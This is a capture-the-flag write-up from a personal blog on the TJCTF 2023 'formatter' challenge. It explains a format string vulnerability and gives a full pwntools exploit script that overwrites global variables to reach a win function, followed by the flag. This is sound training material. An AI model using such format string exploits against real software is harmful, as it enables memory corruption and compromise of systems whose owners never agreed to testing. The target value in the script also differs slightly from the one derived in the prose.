HyggeHalcyon
GithubLinkedIn
  • 🕊️whoami
  • 🚩CTFs
    • 2025
      • ARKAVIDIA Quals
      • TECHOMFEST Quals
    • 2024
      • BackdoorCTF
      • World Wide CTF
      • 7th Cyber Mimic Defense
      • TSA Cyber Champion
      • Cyber Jawara International
      • National Cyber Week Quals
      • COMPFEST 16 Finals
      • HackToday Finals
      • UIUCTF
      • TBTL CTF
      • BSidesSF CTF
      • UMD CTF
      • UMassCTF
      • b01lers CTF
      • AmateursCTF
      • UNbreakable International - Team Phase
    • 2023
      • HackToday CTF Quals
        • Vnote
        • TahuBulat
        • Rangkaian Digital
      • Tenable CTF
        • Skiddyana Pwnz and the Loom of Fate
        • Braggart
      • CiGITS
        • afafafaf
        • popping around shell
        • well_known
      • TJCTF
        • flip out
        • shelly
        • groppling-hook
        • formatter
        • teenage-game
      • SanDiegoCTF
        • money printer
        • turtle shell
      • DeadSec CTF
        • one punch
      • FindIT CTF Quals
        • Debugging Spiders
        • Everything Machine
        • Furr(y)verse
        • Bypass the Py
        • Joy Sketching in the Matrix
        • Detective Handal
        • I Like Matrix
        • CRYptograPI
        • Date Night
        • Web-Find IT
        • Mental Health Check
        • NCS Cipher
        • Discovered
  • 🔍NOTES
    • FSOP
      • Structures
      • GDB
      • Arbitrary Read/Write
      • Vtable Hijack
    • Heap Feng Shui
      • Libc Leak
    • Kernel Space
      • Privilege Escalation
      • Objects
      • Escaping Seccomp
    • V8
      • Documentation
      • TurboFan
      • SandBox (Ubercage)
  • 📚Resources
    • Cyber Security
      • General
      • Red Teaming
        • CheatSheet
        • Payload Database
        • Quality of Life
      • Binary Exploitation
        • Return Oriented Programming
        • File Structure Oriented Programming
        • Heap Exploitation
        • Linux Kernel Exploitation
        • Windows Exploitation
        • V8 Browser
      • Reverse Engineering
        • Windows Executable
        • Malware Analysis
        • Tools
      • Web Exploitation
      • Malware Development
      • Detection Engineering
      • Blockchain / Web3
      • Cryptography
    • Software Engineering
  • 📋Planning
    • Quick Notes
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag
  1. CTFs
  2. 2023
  3. TJCTF

formatter

overwriting global variable

Previousgroppling-hookNextteenage-game

Last updated 1 year ago

Problem

Description

give me a string, any string!

nc tjc.tf 31764

Solution

The name of the challenge indicates that we're going to do an format string vulnerability to exploit this program and we can see this in the main function where after it receives our buffer, it will print without any format specifier allowing us to overwrite values in memory or read values from the stack.

Main also make some memory allocation with calloc of 1 unit in size of 4 bytes which the address of this dynamic memory is being hold by the global variable xd. It will also run r1 with our buffer as parameter, but this parameter won't be relevant.

The relevant line of this code is line 5, which will take xd as a pointer (which hold the address allocated by calloc) and increments the value by two. So It doesn't the value of xd holds (address allocated by calloc), but it will add 2 to the memory allocated by calloc which is pointed by xd

Here, in order for the function to trigger and output the flag, we have to satisfy the condition which is the value of an memory pointed by the address xd holds must be 0x86a793e. So we have to write 0x86a793e - 0x02 into the memory xd pointing to. Problem is that the memory calloc returns is always changing. Recall from the main function we also have another global variable named among. We can instead change the memory pointing from the memory of calloc allocated to the address of among and since PIE isn't enabled, the address is hardcoded. We can then set the value of among to our desire to satisfy the condition

exploit.py
#!usr/bin/python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './chall'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
host = 'tjc.tf'
port = 31764

def start(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE: 
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
break *0x40139c
break *0x004013ad
break *0x004012a4
break *0x04011d4
'''.format(**locals())

# =========================================================
#                         FUZZING
# =========================================================
io = start()
# found offset at %6$p
io.sendlineafter(b'give me a string (or else): ', b'AAAAAAAA.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx')
io.close()

# =========================================================
#                         ADDRESSES
# =========================================================
xd = elf.sym['xd'] # 0x403440
among = elf.sym['among'] # 0x403460
value = 0x86a693c
padding = b'\x01' * 3

# =========================================================
#                         EXPLOITS
# =========================================================
io = start()

# reference : https://www.youtube.com/watch?v=9SWYvhY5dYw
# reference : https://www.youtube.com/watch?v=KgDeMJNK5BU

# 1st overwrite (write the desired value to among)
# 2nd overwrite (a pointer that xd holds, overwrite it into among)

# 1st write 2nd overwrite -> (0x60) ->  96 - 0 = 96 to xd (hhn)
# 1st write 1st overwrite -> (0x086a) -> 2154 - 96 = 2058 to among + 2 (n)
# 2nd write 2nd overwrite -> (0x4034) -> 16372 - 96 = 14218 to xd + 1 (n)
# 2nd write 1st overwrite -> (0x693c) -> 26940 - 2154 = 10568 to among (hn)

# this doesn't work
payload_manual = b'%96X%14$hhn' + b'%2058X%15$n' + b'%14218X%16n' + b'%10568X%17hn' + padding + p64(xd) + p64(among + 2) + p64(xd + 1) + p64(among)

payload_auto = fmtstr_payload(6, {among : value, xd : among})

io.sendlineafter(b'give me a string (or else): ', payload_auto)
print(io.recvall())

I tried to craft the payload on my own, however it doesn't seem to work instead we can use the format string payload provided by pwntools and work just fine.

Flag

tjctf{f0rm4tt3d_5883cc30}

🚩
checksec
decompiled main
decompiled r1
decompiled win
returned value after overwriting in plain mode
returned value after overwriting in hexdump